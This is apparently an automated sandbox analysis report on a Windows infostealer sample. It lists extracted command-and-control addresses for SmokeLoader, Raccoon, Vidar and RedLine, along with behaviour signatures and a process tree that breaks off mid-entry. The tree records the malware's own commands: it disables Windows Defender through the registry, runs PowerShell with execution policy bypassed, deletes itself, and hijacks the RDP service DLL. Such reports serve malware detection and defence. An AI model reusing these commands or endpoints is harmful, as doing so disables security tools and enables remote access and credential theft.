raccoon | 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb

Analysis

max time kernel
152s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
13-10-2021 13:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
Size

310KB
MD5

4e7d2f61317c940dc939ba2ca9393a23
SHA1

12f176cf157b5958fb843907d3d44ac464f13d81
SHA256

6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb
SHA512

8dbd96f861b7e746752e9c2e4eddba9e882b3d18f130ee66574bf244e2e4a1140a4cd034c7b25c04778752b44434c2a2438c0037487c41f50ba361c8774589f0

Malware Config

Extracted

Family

smokeloader

Version

2020

http://honawey7.xyz/

http://wijibui0.xyz/

http://hefahei6.xyz/

http://pipevai4.xyz/

http://nalirou7.xyz/

http://xacokuo8.xyz/

http://hajezey1.xyz/

http://gejajoo7.xyz/

http://sysaheu9.xyz/

http://rixoxeu9.xyz/

rc4.i32

Extracted

Family

raccoon

Version

1.8.2

Botnet

fbe5e97e7d069407605ee9138022aa82166657e6

Attributes

url4cnc
http://telemirror.top/stevuitreen

http://tgmirror.top/stevuitreen

http://telegatt.top/stevuitreen

http://telegka.top/stevuitreen

http://telegin.top/stevuitreen

https://t.me/stevuitreen

rc4.plain

Extracted

Family

vidar

Version

41.3

Botnet

1033

https://mas.to/@oleg98

Attributes

profile_id
1033

Extracted

Family

raccoon

Botnet

4b9b8980a10a7e59f200af975a29a100ba819fe0

Attributes

url4cnc
http://telemirror.top/ararius809b

http://tgmirror.top/ararius809b

http://telegatt.top/ararius809b

http://telegka.top/ararius809b

http://telegin.top/ararius809b

https://t.me/ararius809b

rc4.plain

Extracted

Family

redline

Botnet

109.234.34.165:12323

Extracted

Family

raccoon

Version

1.8.2

Botnet

c8fdd015293e99dac71bc0cfc194d3ce612abf3e

Attributes

url4cnc
http://telemirror.top/rocketmanthem2

http://tgmirror.top/rocketmanthem2

http://telegatt.top/rocketmanthem2

http://telegka.top/rocketmanthem2

http://telegin.top/rocketmanthem2

https://t.me/rocketmanthem2

rc4.plain

Extracted

Family

raccoon

Botnet

7ebf9b416b72a203df65383eec899dc689d2c3d7

Attributes

url4cnc
http://telegatt.top/agrybirdsgamerept

http://telegka.top/agrybirdsgamerept

http://telegin.top/agrybirdsgamerept

https://t.me/agrybirdsgamerept

rc4.plain

Extracted

Family

redline

Botnet

huyzalupanew

135.181.208.162:13904

Extracted

Family

redline

Botnet

@Nastya_ero

45.14.49.66:21899

Extracted

Family

redline

Botnet

MegaProliv2

93.115.20.139:28978

Signatures

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/528-141-0x0000000000A60000-0x0000000000A91000-memory.dmp	family_redline
behavioral1/memory/528-146-0x0000000002850000-0x000000000286C000-memory.dmp	family_redline
behavioral1/memory/1872-199-0x0000000000750000-0x0000000000781000-memory.dmp	family_redline
behavioral1/memory/1872-205-0x0000000002860000-0x000000000287C000-memory.dmp	family_redline
behavioral1/memory/1172-244-0x0000000005A30000-0x0000000005A4C000-memory.dmp	family_redline
behavioral1/memory/1496-250-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral1/memory/1496-251-0x000000000041B252-mapping.dmp	family_redline
behavioral1/memory/4456-405-0x000000000041B22A-mapping.dmp	family_redline
behavioral1/memory/4456-449-0x0000000005700000-0x0000000005D06000-memory.dmp	family_redline

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 3024 created 1872 3024 WerFault.exe FCEC.exe
PID 3064 created 1716 3064 WerFault.exe CFBB.exe
Turns off Windows Defender SpyNet reporting 2 TTPs
evasion

Disabling Security Tools
T1089

Modify Registry
T1112
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

description	pid	process	target process
PID 3024 created 1872	3024	WerFault.exe	FCEC.exe
PID 3064 created 1716	3064	WerFault.exe	CFBB.exe

Nirsoft 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe	Nirsoft
C:\Users\Admin\AppData\Local\Temp\b6f3ec03-8791-47a5-b46e-bf85f644439c\AdvancedRun.exe	Nirsoft

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral1/memory/1332-132-0x0000000003430000-0x0000000003506000-memory.dmp	family_vidar
behavioral1/memory/1332-133-0x0000000000400000-0x0000000001735000-memory.dmp	family_vidar

Downloads MZ/PE file

Executes dropped EXE 31 IoCs

Processes:

C3C3.exeC73E.exeCFBB.exeD3F2.exeDDB7.exeE21D.exeEDF6.exeF4AD.exeE21D.exeFCEC.exeE21D.exe29A.exebbjggue5E7.exe897.exeE21D.exe2364.exebbjggue314F.exe3A97.exesqtvvs.exeAdvancedRun.exeAdvancedRun.exe3A97.exeNylghausHosen_2021-10-12_23-24 2.exeQf5dSHBPGf8J.exe29A.exesqtvvs.exemine.exe6666.exeservices32.exe

pid	process
2756	C3C3.exe
1332	C73E.exe
1716	CFBB.exe
528	D3F2.exe
2168	DDB7.exe
3728	E21D.exe
4092	EDF6.exe
604	F4AD.exe
3884	E21D.exe
1872	FCEC.exe
620	E21D.exe
2344	29A.exe
68	bbjggue
700	5E7.exe
1172	897.exe
1496	E21D.exe
1576	2364.exe
4004	bbjggue
712	314F.exe
1768	3A97.exe
1652	sqtvvs.exe
3800	AdvancedRun.exe
4172	AdvancedRun.exe
4456	3A97.exe
4684	NylghausHosen_2021-10-12_23-24 2.exe
4748	Qf5dSHBPGf8J.exe
444	29A.exe
4488	sqtvvs.exe
4188	mine.exe
4108	6666.exe
3236	services32.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\314F.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\314F.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe	vmprotect

Deletes itself 1 IoCs

Processes:

pid process

1964
Drops startup file 1 IoCs

Processes:

2364.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime.exe 2364.exe
Loads dropped DLL 2 IoCs

Processes:

C73E.exe

pid process

1332 C73E.exe
1332 C73E.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1964

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime.exe	2364.exe

pid	process
1332	C73E.exe
1332	C73E.exe

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

3A97.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	3A97.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	3A97.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	3A97.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	3A97.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	3A97.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	3A97.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	3A97.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	3A97.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\3A97.exe = "0"	3A97.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	3A97.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

Processes:

3A97.exe

pid	process
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe
1768	3A97.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exeE21D.exebbjggue3A97.exe29A.exe

description	pid	process	target process
PID 516 set thread context of 3396	516	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
PID 3728 set thread context of 1496	3728	E21D.exe	E21D.exe
PID 68 set thread context of 4004	68	bbjggue	bbjggue
PID 1768 set thread context of 4456	1768	3A97.exe	3A97.exe
PID 2344 set thread context of 444	2344	29A.exe	29A.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

3024 1872 WerFault.exe FCEC.exe
3064 1716 WerFault.exe CFBB.exe

pid	pid_target	process	target process
3024	1872	WerFault.exe	FCEC.exe
3064	1716	WerFault.exe	CFBB.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

bbjggue6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bbjggue
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bbjggue
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bbjggue
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

C73E.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	C73E.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	C73E.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2228 schtasks.exe
4624 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3228 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1932 taskkill.exe
Modifies registry class 1 IoCs

Processes:

29A.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings 29A.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4116 reg.exe
Runs net.exe

pid	process
2228	schtasks.exe
4624	schtasks.exe

pid	process
3228	timeout.exe

pid	process
1932	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	29A.exe

pid	process
4116	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe

pid	process
3396	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
3396	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964
1964

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

1964
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

640
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exebbjggue

pid process

3396 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
4004 bbjggue

pid	process
1964

pid	process
640

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

D3F2.exetaskkill.exeWerFault.exe897.exepowershell.exeE21D.exepowershell.exe3A97.exeAdvancedRun.exeAdvancedRun.exe29A.exepowershell.exe3A97.exe

description	pid	process
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeDebugPrivilege	528	D3F2.exe
Token: SeDebugPrivilege	1932	taskkill.exe
Token: SeRestorePrivilege	3024	WerFault.exe
Token: SeBackupPrivilege	3024	WerFault.exe
Token: SeDebugPrivilege	3024	WerFault.exe
Token: SeDebugPrivilege	1172	897.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeDebugPrivilege	1496	E21D.exe
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	1768	3A97.exe
Token: SeDebugPrivilege	3800	AdvancedRun.exe
Token: SeImpersonatePrivilege	3800	AdvancedRun.exe
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeDebugPrivilege	4172	AdvancedRun.exe
Token: SeImpersonatePrivilege	4172	AdvancedRun.exe
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeDebugPrivilege	2344	29A.exe
Token: SeDebugPrivilege	4404	powershell.exe
Token: SeDebugPrivilege	4456	3A97.exe
Token: SeShutdownPrivilege	1964
Token: SeCreatePagefilePrivilege	1964
Token: SeShutdownPrivilege	1964

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

1964
1964
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

pid process

1964
1964
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

1964

pid	process
1964
1964

pid	process
1964
1964

pid	process
1964

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exeE21D.exeC73E.execmd.exeDDB7.exe

description	pid	process	target process
PID 516 wrote to memory of 3396	516	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
PID 516 wrote to memory of 3396	516	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
PID 516 wrote to memory of 3396	516	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
PID 516 wrote to memory of 3396	516	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
PID 516 wrote to memory of 3396	516	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
PID 516 wrote to memory of 3396	516	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe	6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
PID 1964 wrote to memory of 2756	1964		C3C3.exe
PID 1964 wrote to memory of 2756	1964		C3C3.exe
PID 1964 wrote to memory of 2756	1964		C3C3.exe
PID 1964 wrote to memory of 1332	1964		C73E.exe
PID 1964 wrote to memory of 1332	1964		C73E.exe
PID 1964 wrote to memory of 1332	1964		C73E.exe
PID 1964 wrote to memory of 1716	1964		CFBB.exe
PID 1964 wrote to memory of 1716	1964		CFBB.exe
PID 1964 wrote to memory of 1716	1964		CFBB.exe
PID 1964 wrote to memory of 528	1964		D3F2.exe
PID 1964 wrote to memory of 528	1964		D3F2.exe
PID 1964 wrote to memory of 528	1964		D3F2.exe
PID 1964 wrote to memory of 2168	1964		DDB7.exe
PID 1964 wrote to memory of 2168	1964		DDB7.exe
PID 1964 wrote to memory of 2168	1964		DDB7.exe
PID 1964 wrote to memory of 3728	1964		E21D.exe
PID 1964 wrote to memory of 3728	1964		E21D.exe
PID 1964 wrote to memory of 3728	1964		E21D.exe
PID 3728 wrote to memory of 3884	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 3884	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 3884	3728	E21D.exe	E21D.exe
PID 1964 wrote to memory of 4092	1964		EDF6.exe
PID 1964 wrote to memory of 4092	1964		EDF6.exe
PID 1964 wrote to memory of 4092	1964		EDF6.exe
PID 1964 wrote to memory of 604	1964		F4AD.exe
PID 1964 wrote to memory of 604	1964		F4AD.exe
PID 1964 wrote to memory of 604	1964		F4AD.exe
PID 3728 wrote to memory of 620	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 620	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 620	3728	E21D.exe	E21D.exe
PID 1964 wrote to memory of 1872	1964		FCEC.exe
PID 1964 wrote to memory of 1872	1964		FCEC.exe
PID 1964 wrote to memory of 1872	1964		FCEC.exe
PID 1332 wrote to memory of 3372	1332	C73E.exe	cmd.exe
PID 1332 wrote to memory of 3372	1332	C73E.exe	cmd.exe
PID 1332 wrote to memory of 3372	1332	C73E.exe	cmd.exe
PID 3372 wrote to memory of 1932	3372	cmd.exe	taskkill.exe
PID 3372 wrote to memory of 1932	3372	cmd.exe	taskkill.exe
PID 3372 wrote to memory of 1932	3372	cmd.exe	taskkill.exe
PID 3728 wrote to memory of 1496	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 1496	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 1496	3728	E21D.exe	E21D.exe
PID 1964 wrote to memory of 2344	1964		29A.exe
PID 1964 wrote to memory of 2344	1964		29A.exe
PID 3372 wrote to memory of 3228	3372	cmd.exe	timeout.exe
PID 3372 wrote to memory of 3228	3372	cmd.exe	timeout.exe
PID 3372 wrote to memory of 3228	3372	cmd.exe	timeout.exe
PID 1964 wrote to memory of 700	1964		5E7.exe
PID 1964 wrote to memory of 700	1964		5E7.exe
PID 2168 wrote to memory of 3268	2168	DDB7.exe	powershell.exe
PID 2168 wrote to memory of 3268	2168	DDB7.exe	powershell.exe
PID 2168 wrote to memory of 3268	2168	DDB7.exe	powershell.exe
PID 1964 wrote to memory of 1172	1964		897.exe
PID 1964 wrote to memory of 1172	1964		897.exe
PID 1964 wrote to memory of 1172	1964		897.exe
PID 3728 wrote to memory of 1496	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 1496	3728	E21D.exe	E21D.exe
PID 3728 wrote to memory of 1496	3728	E21D.exe	E21D.exe

C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
"C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:516
- C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
  "C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:3396

C:\Users\Admin\AppData\Local\Temp\C3C3.exe
C:\Users\Admin\AppData\Local\Temp\C3C3.exe
1⤵
- Executes dropped EXE
PID:2756

C:\Users\Admin\AppData\Local\Temp\C73E.exe
C:\Users\Admin\AppData\Local\Temp\C73E.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1332
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im C73E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C73E.exe" & del C:\ProgramData\*.dll & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im C73E.exe /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1932
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 6
    3⤵
    - Delays execution with timeout.exe
    PID:3228

C:\Users\Admin\AppData\Local\Temp\CFBB.exe
C:\Users\Admin\AppData\Local\Temp\CFBB.exe
1⤵
- Executes dropped EXE
PID:1716
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 928
  2⤵
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Program crash
  PID:3064

C:\Users\Admin\AppData\Local\Temp\D3F2.exe
C:\Users\Admin\AppData\Local\Temp\D3F2.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:528

C:\Users\Admin\AppData\Local\Temp\DDB7.exe
C:\Users\Admin\AppData\Local\Temp\DDB7.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:3268
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1j0jo4oh\1j0jo4oh.cmdline"
    3⤵
    PID:2800
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES220F.tmp" "c:\Users\Admin\AppData\Local\Temp\1j0jo4oh\CSC445D7A85EDD9432F95C54633D8E6EAD.TMP"
      4⤵
      PID:1340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2072
- - C:\Windows\SysWOW64\net.exe
